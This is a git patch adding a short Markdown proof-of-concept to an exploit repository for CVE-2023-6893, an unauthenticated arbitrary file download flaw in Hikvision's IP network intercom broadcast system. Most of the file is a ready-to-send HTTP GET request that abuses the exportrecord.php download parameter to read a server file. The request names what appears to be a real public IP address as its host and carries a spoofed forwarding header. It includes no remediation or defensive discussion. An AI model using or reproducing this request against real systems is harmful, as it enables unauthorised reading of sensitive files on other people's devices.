From 7fd23864c03c52f4e2b20c06555ad47c94d58a14 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Mon, 25 Dec 2023 20:02:23 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=B5=B7=E5=BA=B7=E5=A8=81=E8=A7=86IP?= =?UTF-8?q?=E7=BD=91=E7=BB=9C=E5=AF=B9=E8=AE=B2=E5=B9=BF=E6=92=AD=E7=B3=BB?= =?UTF-8?q?=E7=BB=9F=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8B=E8=BD=BD?= =?UTF-8?q?=E6=BC=8F=E6=B4=9ECVE-2023-6893.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...网络对讲广播系统任意文件下载漏洞CVE-2023-6893.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 海康威视IP网络对讲广播系统任意文件下载漏洞CVE-2023-6893.md diff --git a/海康威视IP网络对讲广播系统任意文件下载漏洞CVE-2023-6893.md b/海康威视IP网络对讲广播系统任意文件下载漏洞CVE-2023-6893.md new file mode 100644 index 0000000..5ecc798 --- /dev/null +++ b/海康威视IP网络对讲广播系统任意文件下载漏洞CVE-2023-6893.md @@ -0,0 +1,17 @@ +## 海康威视IP网络对讲广播系统任意文件下载漏洞CVE-2023-6893 +IP网络对讲广播系统在3.0.3_20201113_RELEASE(HIK)版本中存在任意文件下载漏洞,未授权的攻击者能够通过/php/exportrecord.php文件读取任意文件内容,导致服务器的敏感信息泄露 + +## poc +``` +GET /php/exportrecord.php?downtype=10&downname=C:\ICPAS\Wnmp\WWW\php\conversion.php HTTP/1.1 +Host: 219.128.48.234:4080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +X-Forwarded-For: 1.1.1.1 +``` + +![image](https://github.com/wy876/POC/assets/139549762/45def3bd-0e18-42f5-96c6-2d53c7ebdf34)